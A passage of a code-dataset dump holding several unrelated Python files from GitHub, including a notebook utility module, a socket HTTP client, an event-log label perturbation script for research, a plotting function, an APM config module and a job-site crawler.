builder_client.post(f\"https://builder.guidebook.com/open-api/v1/guides/{guide_id}/publish/\", raise_error=False)\n if response.status_code == 403:\n print(response.content)\n\n except Exception as e:\n print(e)\n traceback.print_exc()\n return {\"statusCode\": 500}\n\n return {\"statusCode\": 200}\n","repo_name":"Guidebook/guidebook-zenefits-integration","sub_path":"add_new_employee_webhook_receiver.py","file_name":"add_new_employee_webhook_receiver.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31396886982","text":"import builtins\nimport difflib\nimport os\nimport re\nimport subprocess # nosec\nimport sys\nimport uuid\nimport warnings\nfrom pathlib import Path\nfrom typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union\n\nimport pkg_resources\nfrom deprecated.sphinx import deprecated\nfrom IPython import get_ipython\nfrom IPython.core.display import HTML, display\nfrom tqdm import tqdm, tqdm_notebook\n\nfrom .._version import VERSION\n\n__version__ = VERSION\n__author__ = \"Ian Hellen\"\n\n\ndef export(func: Callable):\n \"\"\"Decorate function or class to export to __all__.\"\"\"\n mod = sys.modules[func.__module__]\n if hasattr(mod, \"__all__\"):\n all_list = getattr(mod, \"__all__\")\n all_list.append(func.__name__)\n else:\n all_list = [func.__name__]\n setattr(mod, \"__all__\", all_list)\n return func\n\n\n@export\ndef string_empty(string: str) -> bool:\n \"\"\"Return True if the input string is None or whitespace.\"\"\"\n return (string is None) or not (string and string.strip())\n\n\n@export\ndef is_not_empty(test_object: Any) -> bool:\n \"\"\"Return True if the test_object is not None or empty.\"\"\"\n if test_object:\n if isinstance(test_object, str):\n if test_object.strip():\n # test_object is not None AND myString is not empty or blank\n return True\n return False\n return True\n return False\n\n\n# Toggle Code Cell Contents\n_TOGGLE_CODE_STR = \"\"\"\n
\n \n
\n\"\"\"\n\n_TOGGLE_CODE_PREPARE_STR = \"\"\"\n \n\n\"\"\"\n\n\n@export\ndef enable_toggle_code():\n \"\"\"Load JS Function to enable code toggle button.\"\"\"\n display(HTML(_TOGGLE_CODE_PREPARE_STR))\n\n\n@export\ndef toggle_code():\n \"\"\"Display a toggle button to hide/reveal code cell.\"\"\"\n display(HTML(_TOGGLE_CODE_STR))\n\n\n# String escapes\n@export\ndef escape_windows_path(str_path: str) -> str:\n \"\"\"Escape backslash characters in a string.\"\"\"\n if is_not_empty(str_path):\n return str_path.replace(\"\\\\\", \"\\\\\\\\\")\n return str_path\n\n\n@export\ndef unescape_windows_path(str_path: str) -> str:\n \"\"\"Remove escaping from backslash characters in a string.\"\"\"\n if is_not_empty(str_path):\n return str_path.replace(\"\\\\\\\\\", \"\\\\\")\n return str_path\n\n\n@deprecated(reason=\"Inline Javascript no longer supported\", version=\"0.3.2\")\n@export\ndef get_nb_query_param(nb_url_search: str, param: str) -> Optional[str]:\n \"\"\"\n Get a url query parameter from the search string.\n\n Parameters\n ----------\n nb_url_search: str\n The URL search string\n param: str\n The parameter name to search for\n\n Returns\n -------\n Optional[str]\n value of the query string parameter or None if not found.\n\n \"\"\"\n qs_regex = r\"[\\\\?&]{param}=(?P[^&#]*)\".format(param=param)\n query_string_match = re.search(qs_regex, nb_url_search)\n if query_string_match:\n return query_string_match[\"val\"]\n return None\n\n\n@deprecated(reason=\"Inline Javascript no longer supported\", version=\"0.3.2\")\n@export\ndef get_nb_query_params(nb_url_search: str) -> dict:\n \"\"\"\n Get the url query parameters from the search string.\n\n Parameters\n ----------\n nb_url_search : str\n The URL search string\n\n Returns\n -------\n dict\n dictionary of the query string parameters.\n\n \"\"\"\n nb_params = {}\n query_string_match = re.search(r\"\\?(?P[^#]+)#?\", nb_url_search)\n if query_string_match:\n for param in query_string_match[\"qs\"].split(\"&\"):\n if \"=\" in param:\n nb_params[param.split(\"=\")[0]] = param.split(\"=\")[1]\n return nb_params\n\n\n@deprecated(reason=\"Inline Javascript no longer supported\", version=\"0.3.2\")\n@export\ndef get_notebook_query_string():\n \"\"\"Execute javascript to publish notebook query string as python variable.\"\"\"\n HTML(\n \"\"\"\n \n \"\"\"\n )\n\n\n@export\ndef check_py_version(min_ver: Tuple = (3, 6)):\n \"\"\"\n Check that the current python version is not less than `min_ver`.\n\n Parameters\n ----------\n min_ver : Tuple, optional\n Minimum required version, by default (3,6)\n\n \"\"\"\n if isinstance(min_ver, (float, str)):\n min_ver_list = str(min_ver).split(\".\")\n min_ver = (int(min_ver_list[0]), int(min_ver_list[1]))\n if sys.version_info < min_ver:\n print(\"Check the Kernel->Change Kernel menu and ensure that Python 3.6\")\n print(\"or later is selected as the active kernel.\")\n raise SystemExit(\n \"Python %s.%s or later is required.\\n\" % (min_ver[0], min_ver[1])\n )\n\n\n@export\ndef resolve_pkg_path(part_path: str):\n \"\"\"\n Resolve a path relative to the package.\n\n Parameters\n ----------\n part_path : str\n Absolute or relative path to resolve.\n\n \"\"\"\n if Path(part_path).is_absolute():\n return part_path\n\n resolved_path = str(Path(__file__).resolve().parent.parent.joinpath(part_path))\n if Path(resolved_path).exists():\n return str(resolved_path)\n\n searched_paths = list(\n Path(__file__).resolve().parent.parent.glob(str(Path(\"**\").joinpath(part_path)))\n )\n if not searched_paths or len(searched_paths) > 1:\n warnings.warn(f\"No path or ambiguous match for {part_path} not found\")\n return None\n return str(searched_paths[0])\n\n\n# pylint: disable=not-an-iterable, too-many-branches\n@export # noqa: MC0001\ndef check_and_install_missing_packages(\n required_packages: List[str],\n force_notebook: bool = False,\n user: bool = True,\n upgrade: bool = False,\n) -> bool:\n \"\"\"\n Check and install missing packages from provided list of packages.\n\n Parameters\n ----------\n required_packages : List[str]\n List of packages to check and install in a current environment\n Note you can add package version constraints by appending them to\n the package name, e.g. `pandas>=1.01`\n force_notebook : bool, optional\n Boolean value to force notebook version of progress bar,\n by default False (autodetect)\n user : bool, optional\n Boolean value to toggle user flag while installing pip packages,\n by default True\n upgrade: bool, option\n If true supply `--upgrade` flag to pip to install the latest\n version (applies to all package in `required_packages`)\n\n Returns\n -------\n bool :\n True if successful, else False\n\n \"\"\"\n missing_packages = []\n # Check package requirements against installed set\n for req in required_packages:\n pkg_req = pkg_resources.Requirement.parse(req)\n try:\n found_pkg = pkg_resources.working_set.find(pkg_req)\n except pkg_resources.VersionConflict:\n found_pkg = None\n if found_pkg is None:\n missing_packages.append(req)\n\n if not missing_packages:\n print(\"All packages are already installed\")\n return True\n\n print(\"Missing packages to be installed: \", *missing_packages, sep=\" \")\n if is_ipython() or force_notebook:\n pkgbar = tqdm_notebook(missing_packages, desc=\"Installing...\", unit=\"bytes\")\n else:\n pkgbar = tqdm(missing_packages, desc=\"Installing...\", unit=\"bytes\")\n\n pkg_command = [\"pip\", \"install\"]\n if user:\n pkg_command.append(\"--user\")\n if upgrade:\n pkg_command.append(\"--upgrade\")\n pkg_success = True\n for package in pkgbar:\n try:\n subprocess.run( # nosec\n pkg_command + [package],\n check=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n )\n except subprocess.CalledProcessError as proc_err:\n print(f\"An Error has occured while installing {package}.\")\n print(f\"Output: {str(proc_err.stdout)}\")\n print(f\"Errs: {str(proc_err.stderr)}\")\n pkg_success = False\n print(f\"{package} installed.\")\n\n return pkg_success\n\n\n# pylint: enable=not-an-iterable, too-many-branches\n\n\n# pylint: disable=invalid-name\n@export\ndef md(string: str, styles: Union[str, Iterable[str]] = None):\n \"\"\"\n Return string as Markdown with optional style.\n\n Parameters\n ----------\n string : str\n The string to display\n styles : Union[str, Iterable[str]], optional\n A style mnemonic or collection of styles. If multiple styles,\n these can be supplied as an interable of strings or a comma-separated\n string, by default None\n\n \"\"\"\n style_str = \"\"\n if isinstance(styles, str):\n if \",\" in styles:\n styles = [style.strip() for style in styles.split(\",\")]\n else:\n style_str = _F_STYLES.get(styles, \"\")\n if isinstance(styles, list):\n style_str = \";\".join([_F_STYLES.get(style, \"\") for style in styles])\n display(HTML(f\"

{string}

\"))\n\n\n# pylint: enable=invalid-name\n\n\n@export\ndef md_warn(string: str):\n \"\"\"\n Return string as a warning - orange text prefixed by \"Warning\".\n\n Parameters\n ----------\n string : str\n The warning message.\n\n \"\"\"\n md(f\"Warning: {string}\", \"bold, orange, large\")\n\n\n@export\ndef md_error(string: str):\n \"\"\"\n Return string as an error - red text prefixed by \"Error\".\n\n Parameters\n ----------\n string : str\n The error message.\n\n \"\"\"\n md(f\"Error: {string}\", \"bold, orange, large\")\n\n\n# Styles available to use in the above Markdown tools.\n_F_STYLES = {\n \"bold\": \"font-weight: bold\",\n \"italic\": \"font-style: italic\",\n \"red\": \"color: red\",\n \"green\": \"color: green\",\n \"blue\": \"color: blue\",\n \"large\": \"font-size: 130%\",\n \"heading\": \"font-size: 200%\",\n}\n\n\n@export\ndef is_ipython() -> bool:\n \"\"\"\n Return True if running in IPython environment.\n\n Returns\n -------\n bool\n True if running in IPython environment,\n otherwise False\n\n \"\"\"\n return bool(get_ipython())\n\n\ndef check_kwarg(arg_name: str, legal_args: List[str]):\n \"\"\"\n Check argument names against a list.\n\n Parameters\n ----------\n arg_name : str\n Argument to check\n legal_args : List[str]\n List of possible arguments.\n\n Raises\n ------\n NameError\n If the argument is not legal. If the `arg_name` is\n a close match to one or more, `legal_args` these are\n returned in the exception.\n\n \"\"\"\n if arg_name not in legal_args:\n closest = difflib.get_close_matches(arg_name, legal_args)\n mssg = f\"{arg_name} is not a recognized argument. \"\n if len(closest) == 1:\n mssg += f\"Closest match is '{closest[0]}'\"\n elif closest:\n match_list = [f\"'{mtch}'\" for mtch in closest]\n mssg += f\"Closest matches are {', '.join(match_list)}\"\n else:\n mssg += f\"Valid arguments are {', '.join(legal_args)}\"\n raise NameError(arg_name, mssg)\n\n\ndef check_kwargs(supplied_args: Dict[str, Any], legal_args: List[str]):\n \"\"\"\n Check all kwargs names against a list.\n\n Parameters\n ----------\n supplied_args : Dict[str, Any]\n Arguments to check\n legal_args : List[str]\n List of possible arguments.\n\n Raises\n ------\n NameError\n If any of the arguments are not legal. If the an arg is\n a close match to one or more `legal_args`, these are\n returned in the exception.\n\n \"\"\"\n name_errs = []\n for name in supplied_args:\n try:\n check_kwarg(name, legal_args)\n except NameError as err:\n name_errs.append(err)\n if name_errs:\n raise NameError(name_errs)\n\n\n_U_TEST_ENV = \"MP_UNIT_TEST\"\n\n\ndef unit_testing() -> bool:\n \"\"\"\n Return True if in unit testing.\n\n Returns\n -------\n bool\n True if in unit testing\n\n \"\"\"\n return _U_TEST_ENV in os.environ\n\n\n# pylint: disable=invalid-name\ndef set_unit_testing(on: bool = True):\n \"\"\"\n Set flag env var to indicated that code is being unit-tested.\n\n Parameters\n ----------\n on : bool, optional\n Turn unit testing flag on or off, by default True\n\n \"\"\"\n if on:\n os.environ[_U_TEST_ENV] = \"True\"\n else:\n os.environ.pop(_U_TEST_ENV, None)\n\n\n# pylint: enable=invalid-name\n\n\ndef is_valid_uuid(uuid_str: Any) -> bool:\n \"\"\"\n Return true if `uuid_str` is a value GUID/UUID.\n\n Parameters\n ----------\n uuid_str : Any\n String to test\n\n Returns\n -------\n bool\n True if valid GUID/UUID.\n\n \"\"\"\n if not uuid_str:\n return False\n try:\n uuid.UUID(uuid_str)\n except (ValueError, TypeError):\n return False\n return True\n\n\ndef valid_pyname(identifier: str) -> str:\n \"\"\"\n Return legal Python identifier, which doesn't collide with builtins.\n\n Parameters\n ----------\n identifier : str\n The input identifier\n\n Returns\n -------\n str\n The cleaned identifier\n\n \"\"\"\n builtin_names = set(dir(builtins))\n if identifier in builtin_names:\n identifier = f\"{identifier}_bi\"\n identifier = re.sub(\"[^a-zA-Z0-9_]\", \"_\", identifier)\n if identifier[0].isdigit():\n identifier = f\"n_{identifier}\"\n return identifier\n","repo_name":"WeilerWebServices/VirusTotal","sub_path":"msticpy/msticpy/common/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":13643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"26536587098","text":"import socket\n\ndef send_http_request(s, method, url):\n request = f\"{method.upper()} {url} HTTP/1.1\\n\\r\\n\"\n s.sendall(request.encode(\"utf-8\"))\n s.shutdown(socket.SHUT_WR)\n\ndef read_responce(s):\n buf = []\n while True:\n chunk = s.recv(1024)\n if not chunk:\n break\n buf.append(chunk)\n return b''.join(buf)\n","repo_name":"python-fiit/public-materials","sub_path":"25-socket-client/examples/stupid_http_client.py","file_name":"stupid_http_client.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"59059481","text":"import tensorflow\nimport glob\nimport collections\nimport os\nimport pandas as pd\nimport pygal\nfrom collections import Counter\nimport shutil\nimport helpers\n\ndir_name_default = \"D:/dataset/IMGs\"\ndest_dir_name_default = \"D:/dataset/ProcessedData\"\n\nSteeringAngles = []\nFrameNum = []\nImageName = []\nFiles = []\nThrottle = []\n\n\ndir_name = input(\"Please input your images dir:\")\ndest_dir_name = input(\"Please input your destination dir:\")\nstatistics = input(\"Do you want statistics ?\")\n\nif not dir_name:\n dir_name = dir_name_default\n\nif not dest_dir_name:\n dest_dir_name = dest_dir_name_default\n\nfor file in os.listdir(dir_name):\n if file.endswith(\".jpg\"):\n cut = file.split('_')\n SteeringAngles.append(cut[5])\n FrameNum.append(int(cut[1]))\n Throttle.append(cut[3])\n Files.append(file)\n\nhelpers.moveFiles(dest_dir_name, dir_name, Files, ImageName)\n\nData = pd.DataFrame({\n \"ImageName\":ImageName,\n \"Frame\":FrameNum,\n \"SteeringAngles\":SteeringAngles,\n \"Throttle\": Throttle,\n })\n\nhelpers.writeCsv(dest_dir_name, Data)\n\n'''\nStatistics Section\n'''\nif statistics == 'y' or statistics == 'yes':\n ChartData = [round(float(x), 1) for x in SteeringAngles]\n MostCommon = Counter(ChartData).most_common(10)\n\n SteeringAnglesChart = pygal.Bar()\n SteeringAnglesChart.title = \"Steering Angles\"\n\n for i in MostCommon:\n SteeringAnglesChart.add(str(i[0]), i[1])\n\n SteeringAnglesChart.render_to_file('../charts/SteeringAnglesChart.svg')\n\nprint(\"---------------------------------\")\nprint(\"Data preparation was succesfull !\")\nprint(\"---------------------------------\")","repo_name":"Tudor1415/SelfDrivingCarPrototype","sub_path":"DataCollection/preProcessing/getFiles.py","file_name":"getFiles.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21552883278","text":"L = [\"2_ref.txt\",\"3_ref.txt\", \"4_ref.txt\", \"5_ref.txt\", \"6_ref.txt\", \"7_ref.txt\"]\n\nfor file_name in L:\n\tprint(file_name)\n\twith open (file_name, 'r') as f:\n\t\ts = f.readline()\n\t\tchar_nums = {}\n\t\tcount = 0\n\t\tfor c in s:\n\t\t\tif c in char_nums:\n\t\t\t\tchar_nums[c] += 1\n\t\t\telse:\n\t\t\t\tchar_nums[c] = 1\n\t\t\tcount += 1\n\t\t\t# if count >= 100000: break\n\tfor key, value in sorted(char_nums.items(), key=lambda x: x[0]):\n\t\tprint(\" {} : {}\".format(key,value))\n","repo_name":"ArnavM1499/ehrenfeucht-myrcielski-sequence-generalization","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11086493985","text":"from tkinter import filedialog\nfrom pm4py.objects.log.importer.xes import importer as xes_importer\nfrom pm4py.objects.log.exporter.xes import exporter as xes_exporter\nimport numpy as np\nimport os\n\n\nclass CorruptFileSystem:\n def __init__(self):\n self.change_archive_filename = None\n self.filename = None\n self.repaired_filename = None\n self.change_archive_filename = None\n self.log = None\n self.list_for_corruption = []\n self.conditions = []\n\n def get_repair_conditions(self):\n self.change_conditions_file = filedialog.askopenfilename(\n title='Select changes',\n filetypes=(('text files', \"*.txt\"),))\n file = open(self.change_conditions_file, 'r')\n lines = file.readlines()\n for line in lines:\n content = line.split(',') # split on comma\n clean_condition = [element.strip('\\n') for element in content]\n self.list_for_corruption.append(clean_condition)\n for element in self.list_for_corruption:\n print(element)\n\n print('Number of elements:', len(self.list_for_corruption))\n\n def update_corrupt_file(self):\n self.filename = filedialog.askopenfilename(title=\"Select a File ...\",\n filetypes=(\n (\"eventlog files\", \"*.xes\"), (\"eventlog files\", \"*.csv\"),\n (\"all files\", \".*\")))\n file_str = os.path.basename(self.filename)\n initial_file_name = f'corr_{file_str}'\n self.repaired_filename = filedialog.asksaveasfilename(initialfile=initial_file_name,\n defaultextension='.xes',\n title='Save File after Repair',\n filetypes=(\n (\"eventlog files\", \"*.xes\"),\n (\"eventlog files\", \"*.csv\"),\n (\"all files\", \".*\")))\n print(self.repaired_filename)\n\n if self.repaired_filename:\n self.log = xes_importer.apply(self.filename)\n counter = 0\n changed = 0\n print(self.log.attributes.get('concept:name', 'concept:name not available'))\n for trace in self.log:\n for event in trace:\n counter += 1\n for condition in self.list_for_corruption:\n if len(condition) != 3: # skip when error in condition\n continue\n key1, original_value1, suggested_value1 = condition\n # create the labels start and correct right in front; if a change was made, these are updated\n event[f'start:{key1}'] = original_value1\n event[f'correct:{key1}'] = original_value1\n if event[key1] == original_value1:\n selection = np.random.choice(2, 1, p=[0.992, 0.008]) # randomize changes\n if selection == 1:\n event[key1] = suggested_value1\n changed += 1\n event[f'start:{key1}'] = suggested_value1\n event[f'correct:{key1}'] = original_value1\n\n if counter % 5000 == 0: # get feedback for user\n print(f'{changed} elements were adapted.')\n\n try:\n self.log.attributes['synthetic:changes'] = f'{changed} elements in {counter} events were mainpulated: {self.list_for_corruption}'\n except TypeError:\n pass\n\n print(counter)\n print(changed)\n xes_exporter.apply(self.log, self.repaired_filename)\n print('Successful export.')\n else:\n print('No file to save was chosen.')\n\n\nif __name__ == '__main__':\n corruption = CorruptFileSystem()\n corruption.get_repair_conditions()\n corruption.update_corrupt_file()\n","repo_name":"jwiltfang/bachelor-thesis","sub_path":"nlp_label_quality/evaluation/corrupt_files/write_selfcorrupted_log.py","file_name":"write_selfcorrupted_log.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"27224573327","text":"import matplotlib.pyplot as plt\nfrom matplotlib.patches import Ellipse\nimport seaborn as sns\nimport numpy as np\n\ndef trust_diagram(RAIRs, RSRs, RAIDs, RSTs, labels, confidence=None, filename=\"trust-diagram\"):\n fig, axs = plt.subplots(ncols=2, sharex=False, sharey=False, figsize=(10,5))\n plt.subplots_adjust(wspace=0.05, hspace=0)\n\n palette = sns.color_palette(\"colorblind\", 2)\n\n for i in range(len(RAIDs)):\n if confidence == 'ellipse':\n el = Ellipse(xy = (RAIDs[i].mean(), RSRs[i].mean()),\n width=2*1.96*RAIDs[i].std()/np.sqrt(len(RAIDs[i])),\n height=2*1.96*RSRs[i].std()/np.sqrt(len(RSRs[i])),\n label = labels[i], edgecolor=palette[i], facecolor=palette[i], alpha=0.6)\n \n axs[0].add_patch(el)\n elif confidence == 'error':\n axs[0].errorbar(RAIDs[i].mean(), RSRs[i].mean(),\n xerr=1.96*RAIDs[i].std()/np.sqrt(len(RAIDs[i])),\n yerr=1.96*RSRs[i].std()/np.sqrt(len(RSRs[i])),\n label=labels[i], color=palette[i])\n else:\n axs[0].scatter(RAIDs[i].mean(), RSRs[i].mean(), label=labels[i], color=palette[i])\n\n axs[0].axhline(y = 0.5, color='k', ls='--', alpha=0.5)\n axs[0].axvline(x = 0.5, color='k', ls='--', alpha=0.5)\n axs[0].fill_between([-0.02,1.02], -0.02, 0.5, color='red', alpha=0.2, label=\"Automation Bias\") #RSR Basso\n axs[0].fill_betweenx([-0.02,1.02], -0.02, 0.5, color='blue', alpha=0.2, label=\"Automation Complacency\") #RAIR Basso\n\n axs[0].set_xlim(-0.02, 1.02)\n axs[0].set_ylim(-0.02, 1.02)\n axs[0].set_xlabel(\"Relative Beneficial Over-distrust (RBOD)\")\n axs[0].set_ylabel(\"Relative Beneficial Distrust (RBD)\")\n axs[0].legend(loc='center', bbox_to_anchor=(0.5,1.1), ncol=2)\n\n for i in range(len(RSTs)):\n if confidence == 'ellipse':\n el = Ellipse(xy = (RAIRs[i].mean(), RSTs[i].mean()),\n width=2*1.96*RAIRs[i].std()/np.sqrt(len(RAIRs[i])),\n height=2*1.96*RSTs[i].std()/np.sqrt(len(RSTs[i])),\n label = labels[i], edgecolor=palette[i], facecolor=palette[i], alpha=0.6)\n \n axs[1].add_patch(el)\n elif confidence == 'error':\n axs[1].errorbar(RAIRs[i].mean(), RSTs[i].mean(),\n xerr=1.96*RAIRs[i].std()/np.sqrt(len(RAIRs[i])),\n yerr=1.96*RSTs[i].std()/np.sqrt(len(RSTs[i])),\n label=labels[i], color=palette[i])\n else:\n axs[1].scatter(RAIRs[i].mean(), RSTs[i].mean(), label=labels[i], color=palette[i])\n\n axs[1].axhline(y = 0.5, color='k', ls='--', alpha=0.5)\n axs[1].axvline(x = 0.5, color='k', ls='--', alpha=0.5)\n axs[1].fill_between([-0.02,1.02], -0.02, 0.5, color='red', alpha=0.2, label=\"Algorithmic Aversion\") #RAID basso\n axs[1].fill_betweenx([-0.02,1.02], -0.02, 0.5, color='blue', alpha=0.2, label=\"Conservatism Bias\") #RST basso\n\n axs[1].set_xlim(-0.02, 1.02)\n axs[1].set_ylim(-0.02, 1.02)\n axs[1].set_xlabel(\"Relative Beneficial Over-trust (RBOT)\")\n axs[1].set_ylabel(\"Relative Beneficial Trust (RBT)\")\n axs[1].yaxis.tick_right()\n axs[1].yaxis.set_label_position(\"right\")\n axs[1].invert_xaxis()\n axs[1].legend(loc='center', bbox_to_anchor=(0.5,1.1), ncol=2)\n\n plt.savefig(filename + \".png\", dpi=300, bbox_inches=\"tight\")","repo_name":"AndreaCampagner/qualiMLpy","sub_path":"viz/trust_diagram.py","file_name":"trust_diagram.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"2324601697","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport logging\nimport os\nimport sys\n\nfrom scout_apm.core.git_revision import GitRevision\nfrom scout_apm.core.platform_detection import PlatformDetection\nfrom scout_apm.core.util import octal\n\nlogger = logging.getLogger(__name__)\n\n\nclass ScoutConfig(object):\n \"\"\"\n Configuration object for the ScoutApm agent.\n\n Contains a list of configuration \"layers\". When a configuration key is\n looked up, each layer is asked in turn if it knows the value. The first one\n to answer affirmatively returns the value.\n \"\"\"\n\n def __init__(self):\n self.layers = [\n ScoutConfigEnv(),\n ScoutConfigPython(),\n ScoutConfigDerived(self),\n ScoutConfigDefaults(),\n ScoutConfigNull(),\n ]\n\n def value(self, key):\n value = self.locate_layer_for_key(key).value(key)\n if key in CONVERSIONS:\n converted_value = CONVERSIONS[key].convert(value)\n else:\n converted_value = value\n\n return converted_value\n\n def locate_layer_for_key(self, key):\n for layer in self.layers:\n if layer.has_config(key):\n return layer\n else: # pragma: no cover\n # Not reachable because ScoutConfigNull returns None for all keys.\n assert False, \"key not found in any layer\"\n\n def log(self):\n logger.debug(\"Configuration Loaded:\")\n for key in self.known_keys():\n layer = self.locate_layer_for_key(key)\n logger.debug(\"%-9s: %s = %s\", layer.name(), key, layer.value(key))\n\n def known_keys(self):\n return [\n \"app_server\",\n \"application_root\",\n \"core_agent_dir\",\n \"core_agent_download\",\n \"core_agent_launch\",\n \"core_agent_permissions\",\n \"core_agent_version\",\n \"disabled_instruments\",\n \"download_url\",\n \"framework\",\n \"framework_version\",\n \"hostname\",\n \"ignore\",\n \"key\",\n \"log_level\",\n \"monitor\",\n \"name\",\n \"revision_sha\",\n \"scm_subdirectory\",\n \"socket_path\",\n ]\n\n def core_agent_permissions(self):\n try:\n return octal(self.value(\"core_agent_permissions\"))\n except ValueError as e:\n logger.error(\n \"Invalid core_agent_permissions value: %s.\" \" Using default: %s\",\n repr(e),\n 0o700,\n )\n return 0o700\n\n @classmethod\n def set(cls, **kwargs):\n \"\"\"\n Sets a configuration value for the Scout agent. Values set here will\n not override values set in ENV.\n \"\"\"\n global SCOUT_PYTHON_VALUES\n for key, value in kwargs.items():\n SCOUT_PYTHON_VALUES[key] = value\n\n @classmethod\n def reset_all(cls):\n \"\"\"\n Remove all configuration settings set via `ScoutConfig.set(...)`.\n\n This is meant for use in testing.\n \"\"\"\n global SCOUT_PYTHON_VALUES\n SCOUT_PYTHON_VALUES.clear()\n\n\n# Module-level data, the ScoutConfig.set(key=\"value\") adds to this\nSCOUT_PYTHON_VALUES = {}\n\n\nclass ScoutConfigPython(object):\n \"\"\"\n A configuration overlay that lets other parts of python set values.\n \"\"\"\n\n def name(self):\n return \"Python\"\n\n def has_config(self, key):\n return key in SCOUT_PYTHON_VALUES\n\n def value(self, key):\n return SCOUT_PYTHON_VALUES[key]\n\n\nclass ScoutConfigEnv(object):\n \"\"\"\n Reads configuration from environment by prefixing the key\n requested with \"SCOUT_\"\n\n Example: the `log_level` config looks for SCOUT_LOG_LEVEL\n environment variable\n \"\"\"\n\n def name(self):\n return \"ENV\"\n\n def has_config(self, key):\n env_key = self.modify_key(key)\n return env_key in os.environ\n\n def value(self, key):\n env_key = self.modify_key(key)\n return os.environ[env_key]\n\n def modify_key(self, key):\n env_key = (\"SCOUT_\" + key).upper()\n return env_key\n\n\nclass ScoutConfigDerived(object):\n \"\"\"\n A configuration overlay that calculates from other values.\n \"\"\"\n\n def __init__(self, config):\n \"\"\"\n config argument is the overall ScoutConfig var, so we can lookup the\n components of the derived info.\n \"\"\"\n self.config = config\n\n def name(self):\n return \"Derived\"\n\n def has_config(self, key):\n return self.lookup_func(key) is not None\n\n def value(self, key):\n return self.lookup_func(key)()\n\n def lookup_func(self, key):\n \"\"\"\n Returns the derive_#{key} function, or None if it isn't defined\n \"\"\"\n func_name = \"derive_\" + key\n return getattr(self, func_name, None)\n\n def derive_socket_path(self):\n return \"{}/{}/core-agent.sock\".format(\n self.config.value(\"core_agent_dir\"),\n self.config.value(\"core_agent_full_name\"),\n )\n\n def derive_core_agent_full_name(self):\n return \"{name}-{version}-{triple}\".format(\n name=\"scout_apm_core\",\n version=self.config.value(\"core_agent_version\"),\n triple=self.config.value(\"core_agent_triple\"),\n )\n\n def derive_core_agent_triple(self):\n return PlatformDetection.get_triple()\n\n\nclass ScoutConfigDefaults(object):\n \"\"\"\n Provides default values for important configurations\n \"\"\"\n\n def name(self):\n return \"Defaults\"\n\n def __init__(self):\n self.defaults = {\n \"app_server\": \"\",\n \"application_root\": \"\",\n \"core_agent_dir\": \"/tmp/scout_apm_core\",\n \"core_agent_download\": True,\n \"core_agent_launch\": True,\n \"core_agent_permissions\": 700,\n \"core_agent_version\": \"v1.1.8\", # can be an exact tag name, or 'latest'\n \"disabled_instruments\": [],\n \"download_url\": \"https://s3-us-west-1.amazonaws.com/scout-public-downloads/apm_core_agent/release\", # noqa: E501\n \"framework\": \"\",\n \"framework_version\": \"\",\n \"hostname\": \"\",\n \"key\": \"\",\n \"log_level\": \"info\",\n \"monitor\": False,\n \"name\": \"\",\n \"revision_sha\": GitRevision().detect(),\n \"scm_subdirectory\": \"\",\n }\n\n def has_config(self, key):\n return key in self.defaults\n\n def value(self, key):\n return self.defaults[key]\n\n\n# Always returns None to any key\nclass ScoutConfigNull(object):\n \"\"\"\n Always answers that a key is present, but the value is None\n\n Used as the last step of the layered configuration.\n \"\"\"\n\n def name(self):\n return \"Null\"\n\n def has_config(self, key):\n return True\n\n def value(self, key):\n return None\n\n\nstring_type = str if sys.version_info[0] >= 3 else basestring # noqa: F821\n\n\nclass BooleanConversion(object):\n @classmethod\n def convert(cls, value):\n if isinstance(value, bool):\n return value\n if isinstance(value, string_type):\n return value.lower() in (\"yes\", \"true\", \"t\", \"1\")\n # Unknown type - default to false?\n return False\n\n\nclass ListConversion(object):\n @classmethod\n def convert(cls, value):\n if isinstance(value, list):\n return value\n if isinstance(value, tuple):\n return list(value)\n if isinstance(value, string_type):\n # Split on commas\n return [item.strip() for item in value.split(\",\") if item]\n # Unknown type - default to empty?\n return []\n\n\nCONVERSIONS = {\n \"core_agent_download\": BooleanConversion,\n \"core_agent_launch\": BooleanConversion,\n \"monitor\": BooleanConversion,\n \"disabled_instruments\": ListConversion,\n \"ignore\": ListConversion,\n}\n","repo_name":"DheerajS777/Sample-Json-app","sub_path":"vdemo/lib/python3.6/site-packages/scout_apm/core/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"15559186494","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom random import random\nfrom time import sleep\nfrom funs import *\n\nheaders = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'}\nurl = 'https://www.104.com.tw/jb/career/department/navigation?browser=1°ree=3&sid=5003000000'\n\n\n# Get index to every dept.\nresponse = requests.get(url, headers=headers)\nresponse.encoding = 'utf-8'\nhtml = response.text\n\ndom = BeautifulSoup(html, 'html.parser')\nlinks = dom.find_all('a', class_='a2')\n\n# Get links to all dept.\ndept_links = []\nfor link in links:\n dept = link.text\n href = 'https://www.104.com.tw' + link['href']\n dept_links.append((dept, href))\n\n\n\n\n\n\n\n\n\n\n# Crawl and save data\nwith open('dept_info.csv', 'w', encoding='utf-8') as f:\n f.write('dept,直接升學,先工作後升學,不再進修,師生比\\n')\ncount = 0\nfor dept, url in dept_links:\n print('Parsing', dept, '...', count)\n 